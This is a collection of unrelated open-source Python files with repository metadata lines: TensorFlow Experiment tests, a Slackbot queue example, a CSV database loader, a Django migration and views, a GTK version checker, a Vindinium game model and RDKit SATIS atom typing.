from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(0, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(6, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(3, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_monitors_returns_shallow_copy(self):
noop_hook = _NoopHook()
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_monitors=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
self.assertAllEqual([noop_hook], ex.train_hooks)
another_noop_hook = _NoopHook()
# Assert that the property getter returns a shallow copy.
ex.train_hooks.extend([another_noop_hook])
self.assertAllEqual([noop_hook], ex.train_hooks)
# Assert that the extend API mutates the monitors.
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex.train_hooks)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
| anilmuthineni/tensorflow | tensorflow/contrib/learn/python/learn/experiment_test.py | Python | apache-2.0 | 17,120 |
from unittest import TestCase
class TestApp(TestCase):
def test_make_app(self):
from pyramid.router import Router
from yait.app import make_app
global_settings = {}
settings = {'yait.db_url': 'sqlite://',
'yait.auth.secret': 'secret',
'yait.auth.secure_only': 'false',
'yait.auth.timeout': '10',
'yait.session.secret': 'secret'}
wsgi_app = make_app(global_settings, **settings)
self.assertIsInstance(wsgi_app, Router)
| dbaty/Yait | yait/tests/test_app.py | Python | bsd-3-clause | 553 |
import re # noqa
import logging
import argparse
from slackbot_queue import slack_controller, queue
# import commands here
from example import Example
from example2 import Example2
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='Slackbot with task queue')
parser.add_argument('-w', '--worker', action='store_true', help='If set, this will run as a worker')
args = parser.parse_args()
def custom_help(commands, full_event, slack_client):
""" This is currently what the default function does.
Args:
commands (list): List of the command classes that are in the channel where help was triggered
full_event (dict): All of the data from the slack client
slack_client (SlackClient): Api to send message directly to the slack api
Returns:
        dict/None: dict of data to send to the slack api
the keys `channel` & `as_user` & `method` are added before posting on return
"""
message_data = {'method': 'chat.postEphemeral',
'user': full_event['user']['id'],
'text': 'Here are all the commands available in this channel',
'attachments': [],
}
    # # Add a reaction to the help command so others know the bot responded (not in the default help function)
# slack_client.api_call(**{'method': 'reactions.add',
# 'name': 'ok_hand',
# 'channel': full_event['channel']['id'],
# 'timestamp': full_event['message']['ts'],
# })
for command in commands:
try:
parsed_response = command.help()
if parsed_response is not None:
# Add the help message from the command to the return message
message_data['attachments'].extend(parsed_response.get('attachments', []))
except AttributeError as e:
logger.warning("Missing help function in class: {e}".format(e=e))
return message_data
queue.conf.task_default_queue = 'custom_slackbot'
queue.conf.broker_url = 'amqp://guest:guest@localhost:5672//'
# By default the slack token is set by the env var `SLACK_BOT_TOKEN`
# But can also be passed in as a named arg to setup as `slack_bot_token="token_here"` and will override the env var
slack_controller.setup()
# # Set a custom regex for the help message trigger. This is the current defult if not manually set
# # Needs to be after .setup() if using the bot_name/id
# slack_controller.help_message_regex = re.compile('^(?:{bot_name} )?help$'.format(bot_name=slack_controller.BOT_NAME),
# flags=re.IGNORECASE)
# # Set a custom help function action.
# slack_controller.help = custom_help
# Each class needs to be passed the `slack_controller`
example = Example(slack_controller)
example2 = Example2(slack_controller)
# Order of the commands in the channel matter, the first match it finds it will stop
# The order of the channels do not matter though
commands = {'__direct_message__': [],
'__all__': [example, example2],
'bot-dev-1': [],
'general': [],
}
slack_controller.add_commands(commands)
if __name__ == '__main__':
if args.worker is False:
slack_controller.start_listener()
else:
slack_controller.start_worker(argv=['celery', 'worker', '--concurrency', '1', '-l', 'info'])
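# Typical invocation for this example (assumes the amqp broker configured above is
# reachable and SLACK_BOT_TOKEN is exported in the environment):
#   python commands.py            -> start the Slack listener process
#   python commands.py --worker   -> start the Celery worker that runs queued tasks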
| xtream1101/slackbot-task-queue | example/commands.py | Python | mit | 3,629 |
#-*- coding:utf-8 -*-
import csv
import os.path
from . import basededatos
from . import scian3ramas
def eliminar_tabla():
""" Eliminar tabla """
with basededatos.inegi() as bd:
bd.cursor.execute("DROP TABLE IF EXISTS scian_subramas")
print(" Eliminada la tabla scian_subramas si existía.")
def crear_tabla():
""" Crear tabla """
with basededatos.inegi() as bd:
bd.cursor.execute("""
CREATE TABLE scian_subramas (
id serial PRIMARY KEY,
rama integer REFERENCES scian_ramas NOT NULL,
codigo character(5) UNIQUE,
titulo character varying,
descripcion text
)""")
print(" Creada la tabla scian_ramas.")
def insertar(archivo):
""" Verificar si existe el archivo CSV """
if not os.path.isfile(archivo):
raise Exception("No existe el archivo {}".format(archivo))
""" Insertar registros del archivo CSV a la base de datos """
contador = 0
with basededatos.inegi() as bd:
with open(archivo, newline='') as contenedor:
lector = csv.DictReader(contenedor)
for renglon in lector:
codigo = renglon['Código'].strip()
titulo = renglon['Título'].strip()
descripcion = renglon['Descripción'].strip()
bd.cursor.execute("""
INSERT INTO scian_subramas
(rama, codigo, titulo, descripcion)
VALUES
(%s, %s, %s, %s)
""", (scian3ramas.consultar_codigo(codigo[:4]), codigo, titulo, descripcion,))
contador = contador + 1
print(" Se insertaron {} subramas.".format(contador))
| guivaloz/INEGI | DENUE/scian/scian4subramas.py | Python | gpl-3.0 | 1,825 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
if __name__ == '__main__':
pass
| fpeder/mscr | mscr/main.py | Python | bsd-2-clause | 84 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-20 18:12
from __future__ import unicode_literals
from django.db import migrations
def set_coupons_shop(apps, schema_editor):
Coupon = apps.get_model("campaigns", "Coupon")
for coupon_code in Coupon.objects.filter(campaign__isnull=False):
coupon_code.shop = coupon_code.campaign.shop
coupon_code.save()
def remove_coupons_shop(apps, schema_editor):
Coupon = apps.get_model("campaigns", "Coupon")
Coupon.objects.all().update(shop=None)
class Migration(migrations.Migration):
dependencies = [
('campaigns', '0014_campaign_supplier'),
]
operations = [
migrations.RunPython(set_coupons_shop, remove_coupons_shop),
]
| shoopio/shoop | shuup/campaigns/migrations/0015_set_coupon_shops.py | Python | agpl-3.0 | 749 |
import gtk
import urllib
from json import JSONDecoder
from threading import Thread
class VersionCheck:
"""Small class used for checking and displaying current and
latest version of software detected by getting a file from
project hosting site.
"""
URL = 'https://api.github.com/repos/MeanEYE/Sunflower/releases'
def __init__(self, application):
self._dialog = gtk.Window(type=gtk.WINDOW_TOPLEVEL)
self._application = application
# configure window
self._dialog.set_title(_('Version check'))
self._dialog.set_wmclass('Sunflower', 'Sunflower')
self._dialog.set_border_width(7)
self._dialog.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
self._dialog.set_resizable(False)
self._dialog.set_skip_taskbar_hint(True)
self._dialog.set_modal(True)
self._dialog.set_transient_for(application)
self._dialog.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
self._dialog.connect('key-press-event', self._handle_key_press)
# create user interface
vbox = gtk.VBox(False, 5)
hbox = gtk.HBox(False, 0)
table = gtk.Table(2, 2)
table.set_row_spacings(5)
table.set_col_spacings(5)
label_current = gtk.Label(_('Current:'))
label_current.set_alignment(0, 0.5)
label_latest = gtk.Label(_('Latest:'))
label_latest.set_alignment(0, 0.5)
self._entry_current = gtk.Entry()
self._entry_current.set_editable(False)
self._entry_latest = gtk.Entry()
self._entry_latest.set_editable(False)
separator = gtk.HSeparator()
# create controls
button_close = gtk.Button(stock=gtk.STOCK_CLOSE)
button_close.connect('clicked', lambda widget: self._dialog.hide())
# pack user interface
self._dialog.add(vbox)
vbox.pack_start(table, True, True, 0)
vbox.pack_start(separator, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
hbox.pack_end(button_close, False, False, 0)
table.attach(label_current, 0, 1, 0, 1)
table.attach(label_latest, 0, 1, 1, 2)
table.attach(self._entry_current, 1, 2, 0, 1)
table.attach(self._entry_latest, 1, 2, 1, 2)
vbox.show_all()
def __threaded_check(self):
"""Method called in separate thread"""
		url_handler = None
		try:
			# get data from web
			url_handler = urllib.urlopen(self.URL)
			data = url_handler.read()
		finally:
			# always release the connection, even if the download failed
			if url_handler is not None:
				url_handler.close()
		# parse the release list and show the newest tag
		decoder = JSONDecoder()
		releases = decoder.decode(data)
		with gtk.gdk.lock:
			self._entry_latest.set_text(releases[0]['tag_name'])
def _handle_key_press(self, widget, event, data=None):
"""Handle pressing keys"""
if event.keyval == gtk.keysyms.Escape:
self._dialog.hide()
def check(self):
"""Check for new version online"""
version = self._application.version
# prepare template
if version['stage'] != 'f':
template = '{0[major]}.{0[minor]}{0[stage]}-{0[build]}'
else:
template = '{0[major]}.{0[minor]}-{0[build]}'
# populate version values
self._entry_current.set_text(template.format(version))
self._entry_latest.set_text(_('Checking...'))
# show dialog
self._dialog.show()
# start new thread and check for new version
thread = Thread(target=self.__threaded_check)
thread.start()
| Goodmind/sunflower-fm | application/tools/version_check.py | Python | gpl-3.0 | 3,045 |
import vindinium as vin
from vindinium.models import Hero, Map, Tavern, Mine
__all__ = ['Game']
class Game(object):
'''Represents a game.
A game object holds information about the game and is updated automatically
by ``BaseBot``.
Attributes:
id (int): the game id.
max_turns (int): maximum turns of the game (notice that each turn only
a single hero moves).
turn (int): current turn.
map (vindinium.models.Map): a map instance.
heroes (list): a list of Hero instances.
mines (list): a list of Mine instances.
taverns (list): a list of Tavern instances.
'''
def __init__(self, state):
'''Constructor.
Args:
state (dict): the state object.
'''
# Constants
self.id = state['game']['id']
self.max_turns = state['game']['maxTurns']
# Variables
self.turn = state['game']['turn']
# Processed objects
self.map = None
self.heroes = []
self.mines = []
self.taverns = []
# Process the state, creating the objects
self.__processState(state)
def update(self, state):
'''Updates the game with new information.
Notice that, this function does not re-create the objects, just update
the current objects with new information.
Args:
state (dict): the state object.
'''
size = state['game']['board']['size']
tiles = state['game']['board']['tiles']
heroes = state['game']['heroes']
self.turn = state['game']['turn']
for hero, hero_state in zip(self.heroes, heroes):
hero.crashed = hero_state['crashed']
hero.mine_count = hero_state['mineCount']
hero.gold = hero_state['gold']
hero.life = hero_state['life']
hero.last_dir = hero_state.get('lastDir')
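            # the position is deliberately transposed here; it mirrors the
            # map[pos['y'], pos['x']] indexing used in __processState below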
hero.x = hero_state['pos']['y']
hero.y = hero_state['pos']['x']
for mine in self.mines:
char = tiles[mine.x*2 + mine.y*2*size + 1]
mine.owner = None if char == '-' else int(char)
def __processState(self, state):
'''Process the state.'''
# helper variables
board = state['game']['board']
size = board['size']
tiles = board['tiles']
tiles = [tiles[i:i+2] for i in xrange(0, len(tiles), 2)]
# run through the map and update map, mines and taverns
self.map = Map(size)
for y in xrange(size):
for x in xrange(size):
tile = tiles[y*size+x]
if tile == '##':
self.map[x, y] = vin.TILE_WALL
elif tile == '[]':
self.map[x, y] = vin.TILE_TAVERN
self.taverns.append(Tavern(x, y))
elif tile.startswith('$'):
self.map[x, y] = vin.TILE_MINE
self.mines.append(Mine(x, y))
else:
self.map[x, y] = vin.TILE_EMPTY
# create heroes
for hero in state['game']['heroes']:
pos = hero['spawnPos']
self.map[pos['y'], pos['x']] = vin.TILE_SPAWN
self.heroes.append(Hero(hero))
def __str__(self):
'''Pretty map.'''
s = ' '
s += '-'*(self.map.size) + '\n'
for y in xrange(self.map.size):
s += '|'
for x in xrange(self.map.size):
tile = self.map[x, y]
hero = [h for h in self.heroes if h.x==x and h.y==y]
if tile == vin.TILE_WALL: s += '.'
elif any(hero): s+= str(hero[0].id)
elif tile == vin.TILE_SPAWN: s += 's'
elif tile == vin.TILE_MINE: s += 'M'
elif tile == vin.TILE_TAVERN: s += 'T'
else: s += ' '
s += '|\n'
s += ' ' + '-'*(self.map.size)
        return s
 | renatopp/vindinium-python | vindinium/models/game.py | Python | mit | 4,020 |
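A minimal construction sketch for the Game class above (added for illustration, not part of the repository): the dictionary layout is inferred from __processState and update, a real Vindinium state carries more keys, and the import path assumes the package exposes Game alongside the other models.
from vindinium.models import Game
empty_state = {'game': {'id': 'example', 'maxTurns': 20, 'turn': 0,
                        'board': {'size': 2, 'tiles': ' ' * 8},
                        'heroes': []}}
game = Game(empty_state)  # an empty 2x2 map with no heroes
print(game)               # renders the board via __str__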
# vim: set fileencoding=utf8
"""
Story Views
@author: Mike Crute ([email protected])
@organization: SoftGroup Interactive, Inc.
@date: July 10, 2010
"""
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.views.generic import list_detail, create_update
from django.core.urlresolvers import reverse
from projects import models, forms
def create_story(request):
return create_update.create_object(request, form_class=forms.StoryForm,
post_save_redirect=reverse('create-story'))
| mcrute/snakeplan | snakeplan/projects/views/stories.py | Python | apache-2.0 | 999 |
# $Id$
#
# Copyright (C) 2001-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" Functionality for SATIS typing atoms
"""
from rdkit import Chem
_debug = 0
#
# These are SMARTS patterns for the special cases used in
# SATIS typing.
#
aldehydePatt = Chem.MolFromSmarts('[CD2]=[OD1]')
ketonePatt = Chem.MolFromSmarts('[CD3]=[OD1]')
amidePatt = Chem.MolFromSmarts('[CD3](=[OD1])-[#7]')
esterPatt = Chem.MolFromSmarts('C(=[OD1])-O-[#6]')
carboxylatePatt = Chem.MolFromSmarts('C(=[OD1])-[OX1]')
carboxylPatt = Chem.MolFromSmarts('C(=[OD1])-[OX2]')
specialCases = ((carboxylatePatt,97),
(esterPatt,96),
(carboxylPatt,98),
(amidePatt,95),
(ketonePatt,94),
(aldehydePatt,93))
def SATISTypes(mol,neighborsToInclude=4):
""" returns SATIS codes for all atoms in a molecule
The SATIS definition used is from:
J. Chem. Inf. Comput. Sci. _39_ 751-757 (1999)
each SATIS code is a string consisting of _neighborsToInclude_ + 1
2 digit numbers
**Arguments**
- mol: a molecule
- neighborsToInclude (optional): the number of neighbors to include
in the SATIS codes
**Returns**
a list of strings nAtoms long
"""
global specialCases
nAtoms = mol.GetNumAtoms()
atomicNums = [0]*nAtoms
atoms = mol.GetAtoms()
for i in xrange(nAtoms):
atomicNums[i] = atoms[i].GetAtomicNum()
nSpecialCases = len(specialCases)
specialCaseMatches = [None]*nSpecialCases
for i,(patt,idx) in enumerate(specialCases):
if mol.HasSubstructMatch(patt):
specialCaseMatches[i] = mol.GetSubstructMatches(patt)
else:
specialCaseMatches[i] = ()
codes = [None]*nAtoms
for i in range(nAtoms):
code = [99]*(neighborsToInclude+1)
atom = atoms[i]
atomIdx = atom.GetIdx()
code[0] = min(atom.GetAtomicNum(),99)
bonds = atom.GetBonds()
nBonds = len(bonds)
otherIndices = [-1]*nBonds
if _debug: print code[0],
for j in range(nBonds):
otherIndices[j] = bonds[j].GetOtherAtom(atom).GetIdx()
if _debug: print otherIndices[j],
if _debug: print
otherNums = [atomicNums[x] for x in otherIndices] + \
[1]*atom.GetTotalNumHs()
otherNums.sort()
nOthers = len(otherNums)
if nOthers > neighborsToInclude:
otherNums.reverse()
otherNums = otherNums[:neighborsToInclude]
otherNums.reverse()
for j in range(neighborsToInclude):
code[j+1] = min(otherNums[j],99)
else:
for j in range(nOthers):
code[j+1] = min(otherNums[j],99)
if nOthers < neighborsToInclude and code[0] in [6,8]:
found = 0
for j in range(nSpecialCases):
for matchTuple in specialCaseMatches[j]:
if atomIdx in matchTuple:
code[-1] = specialCases[j][1]
found = 1
break
if found:
break
codes[i] = ''.join(['%02d'%(x) for x in code])
return codes
if __name__ == '__main__':
smis = ['CC(=O)NC','CP(F)(Cl)(Br)(O)',
'O=CC(=O)C','C(=O)OCC(=O)O','C(=O)[O-]']
for smi in smis:
print smi
m = Chem.MolFromSmiles(smi)
codes = SATISTypes(m)
print codes
| rdkit/rdkit-orig | rdkit/Chem/SATIS.py | Python | bsd-3-clause | 3,432 |